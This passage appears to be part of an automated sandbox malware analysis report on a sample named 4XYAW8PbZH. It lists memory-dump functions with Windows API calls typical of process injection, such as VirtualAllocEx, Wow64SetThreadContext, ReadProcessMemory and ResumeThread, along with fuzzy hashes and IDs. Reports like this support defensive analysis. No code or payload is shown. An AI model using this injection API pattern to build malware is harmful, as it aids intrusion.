                                                                                                                                                                                              • Instruction Fuzzy Hash: CBC12674E05219CFCB44DFA8D990AEDFBB6FF89300F10866AE419AB355DB309946CB50
                                                                                                                                                                                              Function 07760550 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077605D0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                                                              • Opcode ID: 2f181352c6d82afbc1ae9140b18c4f66da99d1521a7612f5aa5992472cf7161a
                                                                                                                                                                                              • Instruction ID: c2b2d6fb5336d26d46295110cf543886c51f56f6afaf6a705b9b6a7345bd21ff
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f181352c6d82afbc1ae9140b18c4f66da99d1521a7612f5aa5992472cf7161a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B2139B1D003599FCB10DFAAC884ADEFBF5FF48310F10842AE959A7255C7349944CBA4
                                                                                                                                                                                              Function 077602C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07760346
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                              • Opcode ID: 3bd8de0e1662b0cf9af1e340294e5a7d422d0a544fd979925807c020517ff4e7
                                                                                                                                                                                              • Instruction ID: 3f5e367880781f87a1a4a62bcd86114bb41b3584f17156307b1297d248f0d408
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bd8de0e1662b0cf9af1e340294e5a7d422d0a544fd979925807c020517ff4e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 002135B19003098FDB10DFAAC585BEEBBF4EF48324F14882ED559A7245C7789985CFA4
                                                                                                                                                                                              Function 077602C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07760346
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                              • Opcode ID: cd844a2f42c2d2a2481b2ab2719ecb3b3812027080a3e942c5a1baa5c3856da9
                                                                                                                                                                                              • Instruction ID: 17fc939fff9b604685f57e38219328029c0a09eeaa984314d0d1ccf8e08f40e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: cd844a2f42c2d2a2481b2ab2719ecb3b3812027080a3e942c5a1baa5c3856da9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B2138B19003098FDB10DFAAC585BEEBBF4EF48324F14842DD559A7244C7789945CFA4
                                                                                                                                                                                              Function 04F19A00 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04F1BDEA,?,?,?,?,?), ref: 04F1BE8F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                                                                              • Opcode ID: 1d4bedc17aa4119519d12520d184a8b9e89b8a4f4b4a8cb9fcc41bec46a52840
                                                                                                                                                                                              • Instruction ID: ff54042e63eb7013abcd7c4b6847c0b6c9425102987ac46019c5bc9d640d790d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d4bedc17aa4119519d12520d184a8b9e89b8a4f4b4a8cb9fcc41bec46a52840
                                                                                                                                                                                              • Instruction Fuzzy Hash: 35216AB2800259DFDB10CFAAC884AEEBFF8EB48310F14841AE554A7260C334A945CFA5
                                                                                                                                                                                              Function 00DFDCA8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DFDD2F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                              • Opcode ID: 74055f1e2f6194dc87bc5c5ae930c9ec2598a141fe41b21a6a33e1aac6d01b49
                                                                                                                                                                                              • Instruction ID: 62b2e2fe8dd74dd1d837c4fefcc8c01b519b3c196de1b2466fb777f596dc3f4d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 74055f1e2f6194dc87bc5c5ae930c9ec2598a141fe41b21a6a33e1aac6d01b49
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6921E4B59003089FDB10CF9AD984ADEFBF9EB48310F14841AE914A7310D374A940CFA4
                                                                                                                                                                                              Function 00DFBA52 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFBA1E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              • Opcode ID: d3db2c56cd3a581dc3b1dbe6d2b3af045f296cded54daff7c818485a08a1b155
                                                                                                                                                                                              • Instruction ID: f07e8e7f3ffe5e9b640779ad1b58bb5de7d3e42cc22ac796fdc0365bc9f33a07
                                                                                                                                                                                              • Opcode Fuzzy Hash: d3db2c56cd3a581dc3b1dbe6d2b3af045f296cded54daff7c818485a08a1b155
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A11A0716042488FD710DF6AD844BAABBF9DFC5724F09C06BE248DB252CBB59845CBB0
                                                                                                                                                                                              Function 04F19A0C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,04F1BDEA,?,?,?,?,?), ref: 04F1BE8F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                                                                              • Opcode ID: 2ba6bf9df611bc8bc4c45708eff9efc0c096c27e67e2725c071f8806e8b8e61e
                                                                                                                                                                                              • Instruction ID: 894b09a192cc6a690f796f1c52b2c532fd9fbb380fd1b6abec13c037c7e470b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ba6bf9df611bc8bc4c45708eff9efc0c096c27e67e2725c071f8806e8b8e61e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 45113AB5900349DFDB10CF9AC844BDEBFF8EB48310F14841AE554A7260C375A954DFA5
                                                                                                                                                                                              Function 077603A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0776040E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                              • Opcode ID: ea7bf91684befe67785b2828c59b1f7d0f55358514ab4d2a157429bbaac4afd0
                                                                                                                                                                                              • Instruction ID: 5ba826b04880c81231d3296a98c2596ae1019f8b1c78a0815135c6e96e1d4f84
                                                                                                                                                                                              • Opcode Fuzzy Hash: ea7bf91684befe67785b2828c59b1f7d0f55358514ab4d2a157429bbaac4afd0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A1137B19002499FCB20DFAAC844BDEFFF5EF88324F208829E559A7254C775A554CFA4
                                                                                                                                                                                              Function 07760398 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0776040E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                              • Opcode ID: 183e7fa09c2c93bb8f0ecc00ff75daa34264bfd148e2b05f3a1fd579387e3d88
                                                                                                                                                                                              • Instruction ID: 09a4f577d8d069dff85d0c8a9b36ae4029e53aa7ea19e4073d1e0e449befa120
                                                                                                                                                                                              • Opcode Fuzzy Hash: 183e7fa09c2c93bb8f0ecc00ff75daa34264bfd148e2b05f3a1fd579387e3d88
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC1167B29002098FCB20DFA9C445BDEBFF5EF48324F208829D959A7254C7359544CFA0
                                                                                                                                                                                              Function 07760210 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 5e5e982b9ef5f6f80235eb36afbbdf363a7a045f7e0e0728980df7c8b3ba13ee
                                                                                                                                                                                              • Instruction ID: b310b1b6e791ee273a364f86a26a61d334ee5791ccb55ad60e640898161dbc6f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e5e982b9ef5f6f80235eb36afbbdf363a7a045f7e0e0728980df7c8b3ba13ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C1128B19002498FCB10DFAAC445BDEFBF5EF88324F208829C559A7254C735A545CF94
                                                                                                                                                                                              Function 07760218 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 61d53c0a1aec36928c779a87324985758c3913cba9614a6abb4681fe40acaac6
                                                                                                                                                                                              • Instruction ID: 0df9af6b180c2b8dd77f66a32fa21b785da3b25b4bb854eadf66a1e3be620c75
                                                                                                                                                                                              • Opcode Fuzzy Hash: 61d53c0a1aec36928c779a87324985758c3913cba9614a6abb4681fe40acaac6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 691128B19003498FCB20DFAAC445BDEFBF5EF88324F208829D559A7254C675A944CB94
                                                                                                                                                                                              Function 00DFB9B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFBA1E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              • Opcode ID: 4f4e994e5e8b857f72603fcfb85430ea63a8adbfeddf50a8b0048a621d1ac081
                                                                                                                                                                                              • Instruction ID: bb05d05b21edec6bdb6e9e428c3a62a7952904476d9d7d8fb803cba536a6c949
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f4e994e5e8b857f72603fcfb85430ea63a8adbfeddf50a8b0048a621d1ac081
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11E0B5C007498FCB20CF9AD444ADEFBF4EB88324F15C42AD959A7610C3B5A545CFA5
                                                                                                                                                                                              Function 07762EF9 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07762F5D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                              • Opcode ID: 841e9532972b449955a3f147f64e29b6d3f87ca16b98b152b4799ee48169b093
                                                                                                                                                                                              • Instruction ID: faa58d6eef7ed7e012254fdcc8fb81d23bfd0bb4e2e1c24063ad49abec6b9665
                                                                                                                                                                                              • Opcode Fuzzy Hash: 841e9532972b449955a3f147f64e29b6d3f87ca16b98b152b4799ee48169b093
                                                                                                                                                                                              • Instruction Fuzzy Hash: 521125B58003489FDB10DF9AD444BDEFFF8EB48310F108419E958A3240C374A540CFA1
                                                                                                                                                                                              Function 07762F00 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07762F5D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                                                              • Opcode ID: a4eb056cb27a6aaf826995d43913e3222f34f973d8338417938b7226d6c90008
                                                                                                                                                                                              • Instruction ID: fedb0fd4f0f4491e22e6bf87d617fb063d87f61268f5550a291899e45b55d087
                                                                                                                                                                                              • Opcode Fuzzy Hash: a4eb056cb27a6aaf826995d43913e3222f34f973d8338417938b7226d6c90008
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE11D3B58003499FDB10DF9AD489BDEFBF8FB48320F10845AE958A7211C375A544CFA5
                                                                                                                                                                                              Function 054D69D0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: _
                                                                                                                                                                                              • API String ID: 0-701932520
                                                                                                                                                                                              • Opcode ID: 89a92eabfe85d0e76d392304ccf7907ff12e5ceb57d8ba0a7b2a40534b22f0b2
                                                                                                                                                                                              • Instruction ID: 747fe12b9723f56ce7010a00ca14c17c562c8974b5d97e9ce6cb4b7f9162a3b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 89a92eabfe85d0e76d392304ccf7907ff12e5ceb57d8ba0a7b2a40534b22f0b2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10117FB090420ADBCB14DFA5D818BFAFFB5BB45304F2285DAD48597345CB7855059BA0
                                                                                                                                                                                              Function 054D7237 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b04eb4690c15d9f9117f271392620502f9b70e133e536931626b4545be655653
                                                                                                                                                                                              • Instruction ID: e046bdb4b6f5a827fdae7748f5abcb813e3105f82003bb63cd58f06554310a9a
                                                                                                                                                                                              • Opcode Fuzzy Hash: b04eb4690c15d9f9117f271392620502f9b70e133e536931626b4545be655653
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7471C274E04249DFCB15CFA9D850AEEFBF2EB49310F10956AE816AB351E7349942CF60
                                                                                                                                                                                              Function 054D7248 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e5148b86b21d580b074b8934fc620bc43bb1fd840b78cd5cf03a073eb0995000
                                                                                                                                                                                              • Instruction ID: 060002cf134b5500583149eb61348e6b0b90b4840aa18ba0690de2aead0f13e9
                                                                                                                                                                                              • Opcode Fuzzy Hash: e5148b86b21d580b074b8934fc620bc43bb1fd840b78cd5cf03a073eb0995000
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5951A274E04259DBDB04CFA9D950AEEFBF2FB48310F10956AE816AB345E7309942CF60
                                                                                                                                                                                              Function 054D6CAF Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 07d2a17b961f6d8b9b0783af3ca87449741805d468c0bf698e0ba565da8c5e02
                                                                                                                                                                                              • Instruction ID: 129f27972555845ac9791c257a980e412c44a085852464f3cd67964fbc3f80e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 07d2a17b961f6d8b9b0783af3ca87449741805d468c0bf698e0ba565da8c5e02
                                                                                                                                                                                              • Instruction Fuzzy Hash: 99619074E052188FCB10DFA9D994ADEFBF2BB49300F2595AAE409E7315D730A942CF60
                                                                                                                                                                                              Function 054D70E0 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cab0ee7b016ddfcbd055bab5b31c54482e9e05a4d14fddaf2caadc6651c0cf2f
                                                                                                                                                                                              • Instruction ID: 9badb0689a18098baeeff08e1e85547f0505373b7bae398d87055c53014d4e63
                                                                                                                                                                                              • Opcode Fuzzy Hash: cab0ee7b016ddfcbd055bab5b31c54482e9e05a4d14fddaf2caadc6651c0cf2f
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF31F574E0920ADFCB00CFA8D850AEEFBF6EB49254F14556AE816B7301D73059428B60
                                                                                                                                                                                              Function 054D6D09 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0dec344c52f4b7b422974e96f7b766590ac15f72b665b1b4eb21e8d5de4e8e89
                                                                                                                                                                                              • Instruction ID: 6d08fd4c987fe6ffa816c49be3f0b3e7ec43d5f95664e16ec984cb4e441f89da
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dec344c52f4b7b422974e96f7b766590ac15f72b665b1b4eb21e8d5de4e8e89
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A316D74E04219CFDB14DFA9D990A9DFBF2BB49314F2481AAE818E7311D731AA42CF50
                                                                                                                                                                                              Function 00B9D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1829908732.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b9d000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f12245066e90656b41aef593d89d0176a84c886a3fa37f40cc5aa0aa18dc7b46
                                                                                                                                                                                              • Instruction ID: 309c066c950f6483d2f1ad18dfac731195af8fc277c0b0177ed46887d5afc02d
                                                                                                                                                                                              • Opcode Fuzzy Hash: f12245066e90656b41aef593d89d0176a84c886a3fa37f40cc5aa0aa18dc7b46
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33212871504204DFDF05DF15D9C0B26BFA5FB94314F20C5B9D9094B356C336E856C6A2
                                                                                                                                                                                              Function 00B9D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1829908732.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b9d000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9dc4ef43afa64a342f4fc44c48929abdb88438a66c61a08f579f53a9d6c0eace
                                                                                                                                                                                              • Instruction ID: 3a0b1b1740f1db7b290cfe037f0de727220dba2bc28516b19d3cdb821aa21cd4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dc4ef43afa64a342f4fc44c48929abdb88438a66c61a08f579f53a9d6c0eace
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98212271500240DFDF05DF15DAC0B2ABFA5FBA8318F20C5B9E8094B266C336D856CBA2
                                                                                                                                                                                              Function 054D6AE8 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 62a7038d527d7620ec4ae125c618a23196de54e98694cf6aca0775d9bc312ef0
                                                                                                                                                                                              • Instruction ID: 16583a4647d6d1e3772c1a8eb1d91eb8ea301666f7f6d1068dea0ea58cbe40bf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62a7038d527d7620ec4ae125c618a23196de54e98694cf6aca0775d9bc312ef0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5721A575E09219DFCB00CFA9E4985EDFBF6EB49350F115426E916B7310D63459028F71
                                                                                                                                                                                              Function 054DFD98 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
